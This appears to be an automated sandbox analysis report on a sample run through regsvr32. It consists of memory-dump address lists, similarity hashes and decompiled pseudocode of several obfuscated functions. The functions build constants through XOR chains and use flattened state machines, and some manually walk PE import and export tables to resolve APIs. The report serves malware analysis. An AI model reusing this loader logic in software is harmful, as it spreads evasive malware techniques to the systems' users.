                                                                                                                0x001b3ec2
                                                                                                                0x001b3eca
                                                                                                                0x001b3ed2
                                                                                                                0x001b3ed7
                                                                                                                0x001b3edf
                                                                                                                0x001b3ee7
                                                                                                                0x001b3eef
                                                                                                                0x001b3ef7
                                                                                                                0x001b3eff
                                                                                                                0x001b3f07
                                                                                                                0x001b3f0f
                                                                                                                0x001b3f14
                                                                                                                0x001b3f19
                                                                                                                0x001b3f21
                                                                                                                0x001b3f29
                                                                                                                0x001b3f31
                                                                                                                0x001b3f36
                                                                                                                0x001b3f3e
                                                                                                                0x001b3f4b
                                                                                                                0x001b3f4f
                                                                                                                0x001b3f57
                                                                                                                0x001b3f5f
                                                                                                                0x001b3f67
                                                                                                                0x001b3f6c
                                                                                                                0x001b3f74
                                                                                                                0x001b3f7c
                                                                                                                0x001b3f84
                                                                                                                0x001b3f89
                                                                                                                0x001b3f91
                                                                                                                0x001b3f99
                                                                                                                0x001b3fa1
                                                                                                                0x001b3fa9
                                                                                                                0x001b3fae
                                                                                                                0x001b3fb6
                                                                                                                0x001b3fbe
                                                                                                                0x001b3fc6
                                                                                                                0x001b3fce
                                                                                                                0x001b3fd6
                                                                                                                0x001b3fe3
                                                                                                                0x001b3fe7
                                                                                                                0x001b3fef
                                                                                                                0x001b3ffc
                                                                                                                0x001b4000
                                                                                                                0x001b4008
                                                                                                                0x001b4010
                                                                                                                0x001b401b
                                                                                                                0x001b401f
                                                                                                                0x001b4027
                                                                                                                0x001b402f
                                                                                                                0x001b4037
                                                                                                                0x001b403f
                                                                                                                0x001b4047
                                                                                                                0x001b4054
                                                                                                                0x001b405d
                                                                                                                0x001b4061
                                                                                                                0x001b4069
                                                                                                                0x001b4071
                                                                                                                0x001b4079
                                                                                                                0x001b4086
                                                                                                                0x001b408a
                                                                                                                0x001b4092
                                                                                                                0x001b409a
                                                                                                                0x001b409f
                                                                                                                0x001b40a7
                                                                                                                0x001b40bb
                                                                                                                0x001b40c0
                                                                                                                0x001b40c5
                                                                                                                0x001b40c7
                                                                                                                0x001b40cc
                                                                                                                0x001b40f9
                                                                                                                0x001b40fb
                                                                                                                0x001b4100
                                                                                                                0x001b4165
                                                                                                                0x00000000
                                                                                                                0x001b4167
                                                                                                                0x001b4116
                                                                                                                0x001b411f
                                                                                                                0x001b4129
                                                                                                                0x001b412e
                                                                                                                0x001b4160
                                                                                                                0x001b414c
                                                                                                                0x001b4155
                                                                                                                0x001b415a
                                                                                                                0x001b415d
                                                                                                                0x001b415d
                                                                                                                0x00000000
                                                                                                                0x001b4164
                                                                                                                0x001b416d

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 7s$a%
                                                                                                                • API String ID: 0-3959665897
                                                                                                                • Opcode ID: beca20e54f3b74eb281645ddaea50704b02d72558b78ea1c942aa823cec2d618
                                                                                                                • Instruction ID: 81eeaa88ea4efc64641500297a7da4e879c5d8ed956002dac862384000f95de5
                                                                                                                • Opcode Fuzzy Hash: beca20e54f3b74eb281645ddaea50704b02d72558b78ea1c942aa823cec2d618
                                                                                                                • Instruction Fuzzy Hash: 9571F0B14083809FC754CF65C98A80BFBF1BBC9718F408A1DF99596260D3B6DA49CF06
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AA4DE Relevance: 2.6, Strings: 2, Instructions: 145COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001AA4DE(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				void* _t107;
				signed int _t122;
				signed int _t129;
				signed int _t130;
				void* _t133;
				signed int* _t149;
				signed int* _t152;

				_push(_a12);
				_t148 = _a8;
				_t149 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001AC98A(_t107);
				_v100 = 0x598f0a;
				_t152 =  &(( &_v104)[5]);
				_v100 = _v100 + 0x90c;
				_v100 = _v100 + 0xffff1cfa;
				_t133 = 0x1725ccf;
				_t129 = 0x70;
				_v100 = _v100 * 7;
				_v100 = _v100 ^ 0x026cf370;
				_v76 = 0x85bbdb;
				_v76 = _v76 / _t129;
				_v76 = _v76 ^ 0x0002add3;
				_v92 = 0xcaa684;
				_v92 = _v92 + 0x49a3;
				_v92 = _v92 | 0xf2b87ee2;
				_v92 = _v92 ^ 0xf2f9927d;
				_v104 = 0x763e62;
				_v104 = _v104 << 9;
				_v104 = _v104 + 0xffff6747;
				_v104 = _v104 + 0xffff4578;
				_v104 = _v104 ^ 0xec7df451;
				_v96 = 0xa571ea;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 >> 5;
				_v96 = _v96 ^ 0x0001f3aa;
				_v88 = 0xfa8d8d;
				_v88 = _v88 + 0x74a2;
				_v88 = _v88 + 0xffff2337;
				_v88 = _v88 ^ 0x00f9aa9f;
				_v68 = 0x578ecb;
				_t130 = 0x17;
				_v68 = _v68 * 0x2f;
				_v68 = _v68 ^ 0x10191973;
				_v72 = 0x30831e;
				_v72 = _v72 ^ 0x00cbf604;
				_v72 = _v72 ^ 0x00f6e6f7;
				_v80 = 0x6bf173;
				_v80 = _v80 ^ 0x93da2fca;
				_v80 = _v80 ^ 0x93b48c18;
				_v84 = 0xa0e436;
				_v84 = _v84 >> 0xd;
				_v84 = _v84 ^ 0x000f436d;
				_v60 = 0x6f9b5b;
				_v60 = _v60 * 0x3c;
				_v60 = _v60 ^ 0x1a232cb8;
				_v64 = 0x302d4c;
				_v64 = _v64 / _t130;
				_v64 = _v64 ^ 0x000e0659;
				do {
					while(_t133 != 0x5e1249) {
						if(_t133 == 0x1725ccf) {
							_t133 = 0x9f730cf;
							 *_t149 =  *_t149 & 0x00000000;
							_t149[1] = _v100;
							continue;
						} else {
							if(_t133 == 0x4ffe1a5) {
								_push(_t133);
								_t122 = E001A303A(_t133, _t149[1]);
								_t152 =  &(_t152[3]);
								 *_t149 = _t122;
								__eflags = _t122;
								if(__eflags != 0) {
									_t133 = 0x5e1249;
									continue;
								}
							} else {
								if(_t133 == 0x58ab1cc) {
									E001A4E8F(_t148 + 4,  &_v56, __eflags, _v60, _v64);
								} else {
									if(_t133 == 0x9f730cf) {
										_t149[1] = E001BF9AF(_t148);
										_t133 = 0x4ffe1a5;
										continue;
									} else {
										if(_t133 != 0xa873648) {
											goto L13;
										} else {
											E001AE4D8(_v80,  *_t148,  &_v56, _v84);
											_t152 =  &(_t152[2]);
											_t133 = 0x58ab1cc;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t149;
						_t106 =  *_t149 != 0;
						__eflags = _t106;
						return 0 | _t106;
					}
					E001A6DD9( &_v56, _v88, _v68, _t149, _v72);
					_t152 =  &(_t152[3]);
					_t133 = 0xa873648;
					L13:
					__eflags = _t133 - 0x2d97a4d;
				} while (__eflags != 0);
				goto L16;
			}























                                                                                                                0x001aa4e5
                                                                                                                0x001aa4ec
                                                                                                                0x001aa4f3
                                                                                                                0x001aa4f5
                                                                                                                0x001aa4f6
                                                                                                                0x001aa4fe
                                                                                                                0x001aa4ff
                                                                                                                0x001aa504
                                                                                                                0x001aa50c
                                                                                                                0x001aa50f
                                                                                                                0x001aa519
                                                                                                                0x001aa521
                                                                                                                0x001aa532
                                                                                                                0x001aa535
                                                                                                                0x001aa539
                                                                                                                0x001aa541
                                                                                                                0x001aa551
                                                                                                                0x001aa555
                                                                                                                0x001aa55d
                                                                                                                0x001aa565
                                                                                                                0x001aa56d
                                                                                                                0x001aa575
                                                                                                                0x001aa57d
                                                                                                                0x001aa585
                                                                                                                0x001aa58a
                                                                                                                0x001aa592
                                                                                                                0x001aa59a
                                                                                                                0x001aa5a2
                                                                                                                0x001aa5aa
                                                                                                                0x001aa5af
                                                                                                                0x001aa5b4
                                                                                                                0x001aa5bc
                                                                                                                0x001aa5c4
                                                                                                                0x001aa5cc
                                                                                                                0x001aa5d4
                                                                                                                0x001aa5dc
                                                                                                                0x001aa5e9
                                                                                                                0x001aa5ea
                                                                                                                0x001aa5ee
                                                                                                                0x001aa5f6
                                                                                                                0x001aa5fe
                                                                                                                0x001aa606
                                                                                                                0x001aa60e
                                                                                                                0x001aa616
                                                                                                                0x001aa61e
                                                                                                                0x001aa626
                                                                                                                0x001aa62e
                                                                                                                0x001aa633
                                                                                                                0x001aa63b
                                                                                                                0x001aa648
                                                                                                                0x001aa64c
                                                                                                                0x001aa654
                                                                                                                0x001aa667
                                                                                                                0x001aa66b
                                                                                                                0x001aa673
                                                                                                                0x001aa673
                                                                                                                0x001aa681
                                                                                                                0x001aa704
                                                                                                                0x001aa706
                                                                                                                0x001aa709
                                                                                                                0x00000000
                                                                                                                0x001aa683
                                                                                                                0x001aa689
                                                                                                                0x001aa6e6
                                                                                                                0x001aa6eb
                                                                                                                0x001aa6f0
                                                                                                                0x001aa6f3
                                                                                                                0x001aa6f5
                                                                                                                0x001aa6f7
                                                                                                                0x001aa6f9
                                                                                                                0x00000000
                                                                                                                0x001aa6f9
                                                                                                                0x001aa68b
                                                                                                                0x001aa691
                                                                                                                0x001aa74c
                                                                                                                0x001aa697
                                                                                                                0x001aa699
                                                                                                                0x001aa6cc
                                                                                                                0x001aa6cf
                                                                                                                0x00000000
                                                                                                                0x001aa69b
                                                                                                                0x001aa6a1
                                                                                                                0x00000000
                                                                                                                0x001aa6a7
                                                                                                                0x001aa6b6
                                                                                                                0x001aa6bb
                                                                                                                0x001aa6be
                                                                                                                0x00000000
                                                                                                                0x001aa6be
                                                                                                                0x001aa6a1
                                                                                                                0x001aa699
                                                                                                                0x001aa691
                                                                                                                0x001aa689
                                                                                                                0x001aa753
                                                                                                                0x001aa755
                                                                                                                0x001aa75a
                                                                                                                0x001aa75a
                                                                                                                0x001aa761
                                                                                                                0x001aa761
                                                                                                                0x001aa722
                                                                                                                0x001aa727
                                                                                                                0x001aa72a
                                                                                                                0x001aa72f
                                                                                                                0x001aa72f
                                                                                                                0x001aa72f
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: L-0$b>v
                                                                                                                • API String ID: 0-2557773390
                                                                                                                • Opcode ID: 02d4e96a6b00c6bfb40fd27bc6dae8a6bd038d84f847921e912e914f7a37eef0
                                                                                                                • Instruction ID: 633a85ae451e98338e55f8af1958cf9362b87c2ca162c005f8ca826d17c48383
                                                                                                                • Opcode Fuzzy Hash: 02d4e96a6b00c6bfb40fd27bc6dae8a6bd038d84f847921e912e914f7a37eef0
                                                                                                                • Instruction Fuzzy Hash: D45173B5508342ABC758CF20C88982BBBE1FFC5718F90491DF58A96220D3B59A49CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A7013 Relevance: 2.6, Strings: 2, Instructions: 127COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001A7013(void* __ecx, void* __edx) {
				void* _t98;
				void* _t110;
				signed short _t117;
				signed short _t118;
				signed short _t120;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				intOrPtr _t139;
				signed short _t141;
				signed short* _t144;
				signed short _t145;
				intOrPtr _t146;
				void* _t147;
				void* _t148;

				_t146 =  *((intOrPtr*)(_t147 + 0x2c));
				_push(_t146);
				_push( *((intOrPtr*)(_t147 + 0x34)));
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t98);
				 *((intOrPtr*)(_t147 + 0x44)) = 0x3159ec;
				_t148 = _t147 + 0x10;
				_t122 = 0x1f;
				 *(_t148 + 0x34) =  *(_t148 + 0x34) * 0x32;
				 *(_t148 + 0x34) =  *(_t148 + 0x34) / _t122;
				 *(_t148 + 0x34) =  *(_t148 + 0x34) >> 5;
				 *(_t148 + 0x34) =  *(_t148 + 0x34) ^ 0x00027ccb;
				 *(_t148 + 0x24) = 0x9b15dc;
				 *(_t148 + 0x24) =  *(_t148 + 0x24) >> 9;
				 *(_t148 + 0x24) =  *(_t148 + 0x24) ^ 0x000f893d;
				 *(_t148 + 0x14) = 0x385dec;
				_t22 = _t148 + 0x14; // 0x385dec
				_t123 = 0x15;
				 *(_t148 + 0x14) =  *_t22 / _t123;
				 *(_t148 + 0x14) =  *(_t148 + 0x14) | 0x08b1afd6;
				 *(_t148 + 0x14) =  *(_t148 + 0x14) + 0xf2f9;
				 *(_t148 + 0x14) =  *(_t148 + 0x14) ^ 0x08b16093;
				 *(_t148 + 0x20) = 0xa93290;
				 *(_t148 + 0x20) =  *(_t148 + 0x20) >> 0xa;
				 *(_t148 + 0x20) =  *(_t148 + 0x20) ^ 0x0004909a;
				 *(_t148 + 0x10) = 0xf8492e;
				 *(_t148 + 0x10) =  *(_t148 + 0x10) << 2;
				 *(_t148 + 0x10) =  *(_t148 + 0x10) | 0x56178f72;
				 *(_t148 + 0x10) =  *(_t148 + 0x10) + 0x80e9;
				 *(_t148 + 0x10) =  *(_t148 + 0x10) ^ 0x57f90806;
				 *(_t148 + 0x18) = 0x86f050;
				_t124 = 0x4c;
				 *(_t148 + 0x18) =  *(_t148 + 0x18) / _t124;
				 *(_t148 + 0x18) =  *(_t148 + 0x18) | 0x4ac7de04;
				 *(_t148 + 0x18) =  *(_t148 + 0x18) ^ 0x1efe84d7;
				 *(_t148 + 0x18) =  *(_t148 + 0x18) ^ 0x5435c767;
				 *(_t148 + 0x28) = 0x19b075;
				 *(_t148 + 0x28) =  *(_t148 + 0x28) + 0xffff671e;
				 *(_t148 + 0x28) =  *(_t148 + 0x28) ^ 0x0014fd64;
				 *(_t148 + 0x1c) = 0x6484a0;
				_t125 = 0x5e;
				 *(_t148 + 0x1c) =  *(_t148 + 0x1c) / _t125;
				 *(_t148 + 0x1c) =  *(_t148 + 0x1c) + 0xffff0d22;
				 *(_t148 + 0x1c) =  *(_t148 + 0x1c) ^ 0x0001be00;
				_t126 =  *(_t148 + 0x34);
				_t110 =  *((intOrPtr*)(_t146 + 0x3c)) + _t146;
				_t139 =  *((intOrPtr*)(_t110 + 0x78 + _t126 * 8));
				if(_t139 == 0 ||  *((intOrPtr*)(_t110 + 0x7c + _t126 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t139 + _t146;
					while(1) {
						_t113 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t141 = E001A31EA( *((intOrPtr*)(_t148 + 0x30)),  *(_t148 + 0x20),  *(_t148 + 0x28), _t113 + _t146,  *(_t148 + 0x10));
						_t148 = _t148 + 0xc;
						 *(_t148 + 0x34) = _t141;
						__eflags = _t141;
						if(_t141 == 0) {
							L15:
							return 0;
						}
						_t144 =  *_t145 + _t146;
						_t120 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t117 =  *_t144;
							__eflags = _t117;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t129 = _t146 + 2 + _t117;
								__eflags = _t146 + 2 + _t117;
							} else {
								_t129 = _t117 & 0x0000ffff;
							}
							_t118 = E001C1DA1(_t129,  *(_t148 + 0x24), _t141,  *((intOrPtr*)(_t148 + 0x2c)),  *(_t148 + 0x1c));
							_t148 = _t148 + 0xc;
							__eflags = _t118;
							if(_t118 == 0) {
								goto L15;
							} else {
								_t141 =  *(_t148 + 0x34);
								_t144 =  &(_t144[2]);
								 *_t120 = _t118;
								_t120 = _t120 + 4;
								__eflags = _t120;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}




















                                                                                                                0x001a7018
                                                                                                                0x001a701e
                                                                                                                0x001a701f
                                                                                                                0x001a7023
                                                                                                                0x001a7024
                                                                                                                0x001a7025
                                                                                                                0x001a702a
                                                                                                                0x001a7032
                                                                                                                0x001a703e
                                                                                                                0x001a703f
                                                                                                                0x001a704b
                                                                                                                0x001a704f
                                                                                                                0x001a7054
                                                                                                                0x001a705c
                                                                                                                0x001a7064
                                                                                                                0x001a7069
                                                                                                                0x001a7071
                                                                                                                0x001a7079
                                                                                                                0x001a707f
                                                                                                                0x001a7084
                                                                                                                0x001a7088
                                                                                                                0x001a7090
                                                                                                                0x001a7098
                                                                                                                0x001a70a0
                                                                                                                0x001a70a8
                                                                                                                0x001a70ad
                                                                                                                0x001a70b5
                                                                                                                0x001a70bd
                                                                                                                0x001a70c2
                                                                                                                0x001a70ca
                                                                                                                0x001a70d2
                                                                                                                0x001a70da
                                                                                                                0x001a70e8
                                                                                                                0x001a70ed
                                                                                                                0x001a70f1
                                                                                                                0x001a70f9
                                                                                                                0x001a7101
                                                                                                                0x001a7109
                                                                                                                0x001a7111
                                                                                                                0x001a7119
                                                                                                                0x001a7121
                                                                                                                0x001a712f
                                                                                                                0x001a7132
                                                                                                                0x001a7136
                                                                                                                0x001a713e
                                                                                                                0x001a7149
                                                                                                                0x001a714d
                                                                                                                0x001a714f
                                                                                                                0x001a7155
                                                                                                                0x001a71d4
                                                                                                                0x00000000
                                                                                                                0x001a715e
                                                                                                                0x001a715e
                                                                                                                0x001a71cd
                                                                                                                0x001a71cd
                                                                                                                0x001a71d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a717b
                                                                                                                0x001a717d
                                                                                                                0x001a7180
                                                                                                                0x001a7184
                                                                                                                0x001a7186
                                                                                                                0x001a71df
                                                                                                                0x00000000
                                                                                                                0x001a71df
                                                                                                                0x001a718d
                                                                                                                0x001a718f
                                                                                                                0x001a71c4
                                                                                                                0x001a71c4
                                                                                                                0x001a71c6
                                                                                                                0x001a71c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a7193
                                                                                                                0x001a719d
                                                                                                                0x001a719d
                                                                                                                0x001a7195
                                                                                                                0x001a7195
                                                                                                                0x001a7195
                                                                                                                0x001a71ac
                                                                                                                0x001a71b1
                                                                                                                0x001a71b4
                                                                                                                0x001a71b6
                                                                                                                0x00000000
                                                                                                                0x001a71b8
                                                                                                                0x001a71b8
                                                                                                                0x001a71bc
                                                                                                                0x001a71bf
                                                                                                                0x001a71c1
                                                                                                                0x001a71c1
                                                                                                                0x00000000
                                                                                                                0x001a71c1
                                                                                                                0x001a71b6
                                                                                                                0x001a71ca
                                                                                                                0x001a71ca
                                                                                                                0x001a71ca
                                                                                                                0x00000000
                                                                                                                0x001a71cd

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Y1$]8
                                                                                                                • API String ID: 0-3302549726
                                                                                                                • Opcode ID: 570eec4fe22fb7e64ec8a49df5c19a0d57e10de8d951410669059738569a32ea
                                                                                                                • Instruction ID: 707a5e8bf2846155d58c92905dacae37c01bf8e2bab5de87d9efd8b4f3aa4e7a
                                                                                                                • Opcode Fuzzy Hash: 570eec4fe22fb7e64ec8a49df5c19a0d57e10de8d951410669059738569a32ea
                                                                                                                • Instruction Fuzzy Hash: 105197716093029FD358DF24C98592BBBF1FBD4B18F54882CF88586261D7B0DA19CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A9343 Relevance: 2.6, Strings: 2, Instructions: 117COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001A9343(void* __ecx, void* __edx) {
				void* _t94;
				intOrPtr _t107;
				void* _t114;
				void* _t120;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t145;
				intOrPtr _t146;
				intOrPtr _t149;
				void* _t150;
				void* _t151;

				_t149 =  *((intOrPtr*)(_t150 + 0x40));
				_push( *((intOrPtr*)(_t150 + 0x4c)));
				_push(_t149);
				_push( *((intOrPtr*)(_t150 + 0x4c)));
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t94);
				 *((intOrPtr*)(_t150 + 0x44)) = 0x11727c;
				_t151 = _t150 + 0x14;
				 *((intOrPtr*)(_t151 + 0x34)) = 0xd380a7;
				_t146 = 0;
				 *((intOrPtr*)(_t151 + 0x38)) = 0;
				 *((intOrPtr*)(_t151 + 0x3c)) = 0;
				 *(_t151 + 0x14) = 0xf5743f;
				_t122 = 0x2e;
				 *(_t151 + 0x18) =  *(_t151 + 0x14) / _t122;
				 *(_t151 + 0x18) =  *(_t151 + 0x18) | 0x38dd841d;
				 *(_t151 + 0x18) =  *(_t151 + 0x18) ^ 0x38ddd61d;
				 *(_t151 + 0x1c) = 0x2e41e7;
				 *(_t151 + 0x1c) =  *(_t151 + 0x1c) | 0xe5853b54;
				_t123 = 0x5d;
				 *(_t151 + 0x1c) =  *(_t151 + 0x1c) / _t123;
				 *(_t151 + 0x1c) =  *(_t151 + 0x1c) ^ 0x0279d652;
				 *(_t151 + 0x14) = 0x325fdf;
				 *(_t151 + 0x14) =  *(_t151 + 0x14) ^ 0x3c7cb417;
				 *(_t151 + 0x14) =  *(_t151 + 0x14) + 0x92cf;
				_t124 = 0x31;
				 *(_t151 + 0x14) =  *(_t151 + 0x14) * 0x7f;
				 *(_t151 + 0x14) =  *(_t151 + 0x14) ^ 0xeb601870;
				 *(_t151 + 0x20) = 0xa2848;
				 *(_t151 + 0x20) =  *(_t151 + 0x20) / _t124;
				 *(_t151 + 0x20) =  *(_t151 + 0x20) ^ 0x0006e433;
				 *(_t151 + 0x4c) = 0x76882c;
				_t125 = 0x78;
				 *(_t151 + 0x4c) =  *(_t151 + 0x4c) / _t125;
				_t126 = 0x63;
				 *(_t151 + 0x48) =  *(_t151 + 0x4c) / _t126;
				 *(_t151 + 0x48) =  *(_t151 + 0x48) << 5;
				 *(_t151 + 0x48) =  *(_t151 + 0x48) ^ 0x000f1331;
				_t107 =  *((intOrPtr*)(_t149 + 0x3c));
				_t145 =  *(_t151 + 0x14);
				 *((intOrPtr*)(_t151 + 0x2c)) = _t107;
				_t120 =  *((intOrPtr*)(_t107 + _t149 + 0x78)) + _t149;
				 *((intOrPtr*)(_t151 + 0x28)) =  *((intOrPtr*)(_t120 + 0x1c)) + _t149;
				_t128 =  *((intOrPtr*)(_t120 + 0x20)) + _t149;
				 *(_t151 + 0x20) =  *((intOrPtr*)(_t120 + 0x20)) + _t149;
				 *((intOrPtr*)(_t151 + 0x24)) =  *((intOrPtr*)(_t120 + 0x24)) + _t149;
				while(_t145 <  *((intOrPtr*)(_t120 + 0x18))) {
					_t114 = E001B9635( *((intOrPtr*)(_t151 + 0x24)),  *(_t151 + 0x1c),  *((intOrPtr*)(_t128 + _t145 * 4)) + _t149,  *((intOrPtr*)(_t151 + 0x24)),  *(_t151 + 0x48),  *(_t151 + 0x48));
					_t151 = _t151 + 0x10;
					if(_t114 == 0) {
						_t146 =  *((intOrPtr*)( *((intOrPtr*)(_t151 + 0x28)) + ( *( *((intOrPtr*)(_t151 + 0x24)) + _t145 * 2) & 0x0000ffff) * 4)) + _t149;
						if(_t146 >= _t120) {
							_t146 =  <  ? 0 : _t146;
						}
						L7:
						return _t146;
					}
					_t128 =  *(_t151 + 0x20);
					_t145 = _t145 + 1;
				}
				goto L7;
			}

















                                                                                                                0x001a9348
                                                                                                                0x001a934e
                                                                                                                0x001a9352
                                                                                                                0x001a9353
                                                                                                                0x001a9357
                                                                                                                0x001a9358
                                                                                                                0x001a9359
                                                                                                                0x001a935e
                                                                                                                0x001a9366
                                                                                                                0x001a9369
                                                                                                                0x001a9373
                                                                                                                0x001a9375
                                                                                                                0x001a9379
                                                                                                                0x001a937d
                                                                                                                0x001a938b
                                                                                                                0x001a9390
                                                                                                                0x001a9396
                                                                                                                0x001a939e
                                                                                                                0x001a93a6
                                                                                                                0x001a93ae
                                                                                                                0x001a93ba
                                                                                                                0x001a93bf
                                                                                                                0x001a93c5
                                                                                                                0x001a93cd
                                                                                                                0x001a93d5
                                                                                                                0x001a93dd
                                                                                                                0x001a93ea
                                                                                                                0x001a93ed
                                                                                                                0x001a93f1
                                                                                                                0x001a93f9
                                                                                                                0x001a9409
                                                                                                                0x001a940d
                                                                                                                0x001a9415
                                                                                                                0x001a9421
                                                                                                                0x001a9426
                                                                                                                0x001a9430
                                                                                                                0x001a9433
                                                                                                                0x001a9437
                                                                                                                0x001a943c
                                                                                                                0x001a9444
                                                                                                                0x001a9447
                                                                                                                0x001a944b
                                                                                                                0x001a9453
                                                                                                                0x001a945d
                                                                                                                0x001a9461
                                                                                                                0x001a9468
                                                                                                                0x001a946c
                                                                                                                0x001a949d
                                                                                                                0x001a948c
                                                                                                                0x001a9491
                                                                                                                0x001a9496
                                                                                                                0x001a94b3
                                                                                                                0x001a94b7
                                                                                                                0x001a94c7
                                                                                                                0x001a94c7
                                                                                                                0x001a94cb
                                                                                                                0x001a94d3
                                                                                                                0x001a94d3
                                                                                                                0x001a9498
                                                                                                                0x001a949c
                                                                                                                0x001a949c
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: H($A.
                                                                                                                • API String ID: 0-2251998262
                                                                                                                • Opcode ID: 369bf18cad9c9a825925ee672bc48449f96ee962289b027eed8e27e2b62fd5b7
                                                                                                                • Instruction ID: e13c776992775645f89a7f841878581d9cbbee0605ea102ef79f915831015a75
                                                                                                                • Opcode Fuzzy Hash: 369bf18cad9c9a825925ee672bc48449f96ee962289b027eed8e27e2b62fd5b7
                                                                                                                • Instruction Fuzzy Hash: 6A414671A083019FC308CF29D98451BBBF2EBC9748F00892DF99897251C776EA598F96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B6E97 Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001B6E97(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t113;
				void* _t117;
				signed int _t119;
				intOrPtr _t131;
				intOrPtr* _t132;
				intOrPtr _t133;
				signed int* _t135;

				_t135 =  &_v56;
				_v8 = 0x279e49;
				_t131 =  *0x1c420c; // 0x67d5d8
				_v4 = 0;
				_t117 = __ecx;
				_v44 = 0xa926c9;
				_t132 = _t131 + 0x18;
				_v44 = _v44 + 0xef81;
				_t119 = 0x30;
				_v44 = _v44 / _t119;
				_v44 = _v44 ^ 0x00038b21;
				_v20 = 0xd92ca0;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x0000a0c2;
				_v24 = 0x34a947;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x0007f166;
				_v48 = 0x7ae245;
				_v48 = _v48 + 0xf278;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x0004ce87;
				_v52 = 0x9ed5b7;
				_v52 = _v52 >> 4;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x0008c24b;
				_v36 = 0xdf8ab9;
				_v36 = _v36 + 0xbf2b;
				_v36 = _v36 * 0x17;
				_v36 = _v36 ^ 0x142dddc0;
				_v40 = 0xa226c0;
				_v40 = _v40 | 0xca7af793;
